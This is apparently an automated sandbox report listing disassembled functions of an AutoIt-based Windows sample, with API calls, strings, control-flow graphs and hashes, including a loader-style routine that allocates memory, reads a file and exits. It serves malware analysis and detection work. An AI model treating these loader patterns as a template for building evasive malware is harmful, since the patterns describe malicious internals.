                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb]$pb]$pb]$pb]
                                                                      • API String ID: 4212290369-2777755825
                                                                      • Opcode ID: 533a553f007f0e8a8e45b1ca06ca741495006183bb72dc074eeb9bb5a83da0f0
                                                                      • Instruction ID: d2da6151a23434f7f974fed2a045773209e33f50e26ef73372816e5783b06f1d
                                                                      • Opcode Fuzzy Hash: 533a553f007f0e8a8e45b1ca06ca741495006183bb72dc074eeb9bb5a83da0f0
                                                                      • Instruction Fuzzy Hash: 26B2E470609742DFD724DF24C4A8BAABFE4BF85305F14491EE849972E1D770E889DB82
                                                                      Function 00579155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00578F5F: __time64.LIBCMT ref: 00578F69
                                                                        • Part of subcall function 00514EE5: _fseek.LIBCMT ref: 00514EFD
                                                                      • __wsplitpath.LIBCMT ref: 00579234
                                                                        • Part of subcall function 005340FB: __wsplitpath_helper.LIBCMT ref: 0053413B
                                                                      • _wcscpy.LIBCMT ref: 00579247
                                                                      • _wcscat.LIBCMT ref: 0057925A
                                                                      • __wsplitpath.LIBCMT ref: 0057927F
                                                                      • _wcscat.LIBCMT ref: 00579295
                                                                      • _wcscat.LIBCMT ref: 005792A8
                                                                        • Part of subcall function 00578FA5: _memmove.LIBCMT ref: 00578FDE
                                                                        • Part of subcall function 00578FA5: _memmove.LIBCMT ref: 00578FED
                                                                      • _wcscmp.LIBCMT ref: 005791EF
                                                                        • Part of subcall function 00579734: _wcscmp.LIBCMT ref: 00579824
                                                                        • Part of subcall function 00579734: _wcscmp.LIBCMT ref: 00579837
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00579452
                                                                      • _wcsncpy.LIBCMT ref: 005794C5
                                                                      • DeleteFileW.KERNEL32(?,?), ref: 005794FB
                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00579511
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00579522
                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00579534
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                      • String ID:
                                                                      • API String ID: 1500180987-0
                                                                      • Opcode ID: b15e15a34cec00257ed4d8ae3d0dd936347dec59e2429c149a0586ce5447e122
                                                                      • Instruction ID: a7b922b34fb7927487f0e133e3432b2475a7ee7268be9ab1ddcd007a321352db
                                                                      • Opcode Fuzzy Hash: b15e15a34cec00257ed4d8ae3d0dd936347dec59e2429c149a0586ce5447e122
                                                                      • Instruction Fuzzy Hash: 48C14DB1D00119AADF11DF95DC85EDEBBB9FF85310F0084AAF609E7241DB309A859F61
                                                                      Function 00513015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00513074
                                                                      • RegisterClassExW.USER32(00000030), ref: 0051309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005130AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 005130CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005130DC
                                                                      • LoadIconW.USER32(000000A9), ref: 005130F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00513101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 214b9c7cb653745d8bfa6947f82dda4ea90e3f012a679dd655d8d8d68b436272
                                                                      • Instruction ID: 64d189811e518f0646b7047f8e7136d521614571c1cb7eeed289766883f0a99e
                                                                      • Opcode Fuzzy Hash: 214b9c7cb653745d8bfa6947f82dda4ea90e3f012a679dd655d8d8d68b436272
                                                                      • Instruction Fuzzy Hash: AC313671806344AFDB108FA4E889ADABFF4FB19310F24416BE580E62A0E3B50588EF51
                                                                      Function 00513041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00513074
                                                                      • RegisterClassExW.USER32(00000030), ref: 0051309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005130AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 005130CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005130DC
                                                                      • LoadIconW.USER32(000000A9), ref: 005130F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00513101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 833ebc4c12fe1c753eb0cc0de321418dd2289009869d47aa02ad05e019f1fd84
                                                                      • Instruction ID: b54820ce48101f9ab1d67625d0f9fecee19ce222a41fc929b5dacd5a40ab03fd
                                                                      • Opcode Fuzzy Hash: 833ebc4c12fe1c753eb0cc0de321418dd2289009869d47aa02ad05e019f1fd84
                                                                      • Instruction Fuzzy Hash: C921E5B5901608AFDB10DFA4E849BDDBBF8FB18701F10412BF511E62A0E7B14548AF91
                                                                      Function 0051708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00514706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005D52F8,?,005137AE,?), ref: 00514724
                                                                        • Part of subcall function 0053050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00517165), ref: 0053052D
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005171A8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0054E8C8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0054E909
                                                                      • RegCloseKey.ADVAPI32(?), ref: 0054E947
                                                                      • _wcscat.LIBCMT ref: 0054E9A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 2673923337-2727554177
                                                                      • Opcode ID: 357853dc38183d55f7bd1a5f8abb81652e3e38c1067cd9549528c5daee394533
                                                                      • Instruction ID: 75ec5cec0143ccac03d6b05ad39d149b6d11bb50ff6cd28762415e947bd3ea46
                                                                      • Opcode Fuzzy Hash: 357853dc38183d55f7bd1a5f8abb81652e3e38c1067cd9549528c5daee394533
                                                                      • Instruction Fuzzy Hash: 9C716B755093029ED710EF29E8959ABBFF8FF98310F40092FF445872A0EB71994ADB52
                                                                      Function 00513633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 760 513633-513681 762 5136e1-5136e3 760->762 763 513683-513686 760->763 762->763 764 5136e5 762->764 765 5136e7 763->765 766 513688-51368f 763->766 769 5136ca-5136d2 DefWindowProcW 764->769 770 54d0cc-54d0fa call 521070 call 521093 765->770 771 5136ed-5136f0 765->771 767 513695-51369a 766->767 768 51374b-513753 PostQuitMessage 766->768 773 54d154-54d168 call 572527 767->773 774 5136a0-5136a2 767->774 775 513711-513713 768->775 776 5136d8-5136de 769->776 804 54d0ff-54d106 770->804 777 5136f2-5136f3 771->777 778 513715-51373c SetTimer RegisterWindowMessageW 771->778 773->775 797 54d16e 773->797 780 513755-51375f call 5144a0 774->780 781 5136a8-5136ad 774->781 775->776 784 5136f9-51370c KillTimer call 51443a call 513114 777->784 785 54d06f-54d072 777->785 778->775 782 51373e-513749 CreatePopupMenu 778->782 798 513764 780->798 787 5136b3-5136b8 781->787 788 54d139-54d140 781->788 782->775 784->775 791 54d074-54d076 785->791 792 54d0a8-54d0c7 MoveWindow 785->792 795 54d124-54d134 call 572d36 787->795 796 5136be-5136c4 787->796 788->769 802 54d146-54d14f call 567c36 788->802 799 54d097-54d0a3 SetFocus 791->799 800 54d078-54d07b 791->800 792->775 795->775 796->769 796->804 797->769 798->775 799->775 800->796 805 54d081-54d092 call 521070 800->805 802->769 804->769 809 54d10c-54d11f call 51443a call 51434a 804->809 805->775 809->769
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 005136D2
                                                                      • KillTimer.USER32(?,00000001), ref: 005136FC
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0051371F
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051372A
                                                                      • CreatePopupMenu.USER32 ref: 0051373E
                                                                      • PostQuitMessage.USER32(00000000), ref: 0051374D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated$%Z
                                                                      • API String ID: 129472671-3280111068
                                                                      • Opcode ID: f0f77af7fc4000aaf2887ae1beb565f578fb181dcd728b14418df46487a73982
                                                                      • Instruction ID: 2344ea59a657a6b073d80b12bfc4e75c3498b52dcd0ade05fdb79ab4eaba3498
                                                                      • Opcode Fuzzy Hash: f0f77af7fc4000aaf2887ae1beb565f578fb181dcd728b14418df46487a73982
                                                                      • Instruction Fuzzy Hash: 9B41F4B5200506EBFB245F68EC1DBFD3FA4FB65301F140927F502D62E1EA609E89A761
                                                                      Function 00513A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00513A50
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00513A5F
                                                                      • LoadIconW.USER32(00000063), ref: 00513A76
                                                                      • LoadIconW.USER32(000000A4), ref: 00513A88
                                                                      • LoadIconW.USER32(000000A2), ref: 00513A9A
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00513AC0
                                                                      • RegisterClassExW.USER32(?), ref: 00513B16
                                                                        • Part of subcall function 00513041: GetSysColorBrush.USER32(0000000F), ref: 00513074
                                                                        • Part of subcall function 00513041: RegisterClassExW.USER32(00000030), ref: 0051309E
                                                                        • Part of subcall function 00513041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005130AF
                                                                        • Part of subcall function 00513041: InitCommonControlsEx.COMCTL32(?), ref: 005130CC
                                                                        • Part of subcall function 00513041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005130DC
                                                                        • Part of subcall function 00513041: LoadIconW.USER32(000000A9), ref: 005130F2
                                                                        • Part of subcall function 00513041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00513101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: 4cca56e45210a72d1bd293072f5180bbb0d1035d2c7de13914c1a068ee3850b1
                                                                      • Instruction ID: b9ac6de98a80b788a08d7d4e4b82a68d985caf89cc625f578623942bc0509ef1
                                                                      • Opcode Fuzzy Hash: 4cca56e45210a72d1bd293072f5180bbb0d1035d2c7de13914c1a068ee3850b1
                                                                      • Instruction Fuzzy Hash: DD211C75901304AFEB20DFA4EC49B9D7FB5FB18711F10011BE504A62A1E3B55558AF94
                                                                      Function 00513766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R]
                                                                      • API String ID: 1825951767-2147881669
                                                                      • Opcode ID: 47c9f0864e40bc0ac17d2050b5c274906364b22a805e220580cc4122fa8bc7c9
                                                                      • Instruction ID: a4ffaece4d46c40f66443f2d62d965ee0daf816abe8bb119fe3feeb61ea922a4
                                                                      • Opcode Fuzzy Hash: 47c9f0864e40bc0ac17d2050b5c274906364b22a805e220580cc4122fa8bc7c9
                                                                      • Instruction Fuzzy Hash: B8A15F7590021EAAEF14EBA4DC59AEEBF78BF94300F40052AF415B7191EF745A88CB60
                                                                      Function 0051F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00530193
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0053019B
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005301A6
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 005301B1
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(00000011,00000000), ref: 005301B9
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(00000012,00000000), ref: 005301C1
                                                                        • Part of subcall function 005260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0051F930), ref: 00526154
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0051F9CD
                                                                      • OleInitialize.OLE32(00000000), ref: 0051FA4A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 005545C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: <W]$\T]$%Z$S]
                                                                      • API String ID: 1986988660-1068505368
                                                                      • Opcode ID: 8364bd511748c75337e5a81be5b24b5b1fbd13d94e87003026dd60a54b622df6
                                                                      • Instruction ID: 28189a67f08aad9b81c37370435253cc0377e5e6839895c7f56d71c71f775a30
                                                                      • Opcode Fuzzy Hash: 8364bd511748c75337e5a81be5b24b5b1fbd13d94e87003026dd60a54b622df6
                                                                      • Instruction Fuzzy Hash: A281ABB0903A41CFCBA4DF3DA9446587FE5FBA93467A0852BA018CB361F7704488EF56
                                                                      Function 01036598 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 983 1036598-1036646 call 1033fc8 986 103664d-1036673 call 10374a8 CreateFileW 983->986 989 1036675 986->989 990 103667a-103668a 986->990 991 10367c5-10367c9 989->991 995 1036691-10366ab VirtualAlloc 990->995 996 103668c 990->996 993 103680b-103680e 991->993 994 10367cb-10367cf 991->994 997 1036811-1036818 993->997 998 10367d1-10367d4 994->998 999 10367db-10367df 994->999 1002 10366b2-10366c9 ReadFile 995->1002 1003 10366ad 995->1003 996->991 1004 103681a-1036825 997->1004 1005 103686d-1036882 997->1005 998->999 1000 10367e1-10367eb 999->1000 1001 10367ef-10367f3 999->1001 1000->1001 1008 1036803 1001->1008 1009 10367f5-10367ff 1001->1009 1010 10366d0-1036710 VirtualAlloc 1002->1010 1011 10366cb 1002->1011 1003->991 1012 1036827 1004->1012 1013 1036829-1036835 1004->1013 1006 1036892-103689a 1005->1006 1007 1036884-103688f VirtualFree 1005->1007 1007->1006 1008->993 1009->1008 1014 1036712 1010->1014 1015 1036717-1036732 call 10376f8 1010->1015 1011->991 1012->1005 1016 1036837-1036847 1013->1016 1017 1036849-1036855 1013->1017 1014->991 1023 103673d-1036747 1015->1023 1019 103686b 1016->1019 1020 1036862-1036868 1017->1020 1021 1036857-1036860 1017->1021 1019->997 1020->1019 1021->1019 1024 103677a-103678e call 1037508 1023->1024 1025 1036749-1036778 call 10376f8 1023->1025 1031 1036792-1036796 1024->1031 1032 1036790 1024->1032 1025->1023 1033 10367a2-10367a6 1031->1033 1034 1036798-103679c CloseHandle 1031->1034 1032->991 1035 10367b6-10367bf 1033->1035 1036 10367a8-10367b3 VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01036669
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0103688F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                      • Instruction ID: af675a36539e0e7c5d5e4c8b4ae8c4fc733f8711077b6f778c9249f4802be154
                                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                      • Instruction Fuzzy Hash: 54A12C74E00209EBEB14CF94C894BEEBBB9FF88704F208599E541BB281D7769A41CF54
                                                                      Function 005139D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1114 5139d5-513a45 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00513A03
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00513A24
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00513A38
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00513A41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: 4a43297b188e0aa3e3e484245e311fe16296308e2bdb5bbcc77f7c8cb2a4d262
                                                                      • Instruction ID: c46b6e4df22fba5c8bb84f3d441a404c9a6324466a5325822f382bf4010b9ebc
                                                                      • Opcode Fuzzy Hash: 4a43297b188e0aa3e3e484245e311fe16296308e2bdb5bbcc77f7c8cb2a4d262
                                                                      • Instruction Fuzzy Hash: F1F03A746022907EEA3097236C48E6B2F7DE7D6F50B01002BB900E2170D2610808EAB0
                                                                      Function 01036378 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1467 1036378-1036498 call 1033fc8 call 1036268 CreateFileW 1474 103649a 1467->1474 1475 103649f-10364af 1467->1475 1476 103654f-1036554 1474->1476 1478 10364b1 1475->1478 1479 10364b6-10364d0 VirtualAlloc 1475->1479 1478->1476 1480 10364d2 1479->1480 1481 10364d4-10364eb ReadFile 1479->1481 1480->1476 1482 10364ef-1036529 call 10362a8 call 1035268 1481->1482 1483 10364ed 1481->1483 1488 1036545-103654d ExitProcess 1482->1488 1489 103652b-1036540 call 10362f8 1482->1489 1483->1476 1488->1476 1489->1488
                                                                      APIs
                                                                        • Part of subcall function 01036268: Sleep.KERNELBASE(000001F4), ref: 01036279
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0103648E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: YMHYF3NOKWF
                                                                      • API String ID: 2694422964-3138929083
